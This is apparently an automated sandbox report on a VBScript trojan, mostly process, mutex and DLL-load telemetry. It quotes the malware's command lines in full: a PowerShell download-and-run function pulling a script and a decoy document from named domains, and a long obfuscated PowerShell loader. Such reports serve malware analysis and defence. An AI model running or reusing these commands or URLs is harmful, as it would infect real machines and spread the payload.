                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4318
                        Source: unknownProcess created: Commandline size = 4318
                        Source: amsi32_5568.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@22/247@3/5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\k9o5xs1hnem9ja8a.vbs
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eohnalwy.nkl.ps1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7968
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5568
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: YinLHGpoX4.vbsReversingLabs: Detection: 13%
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
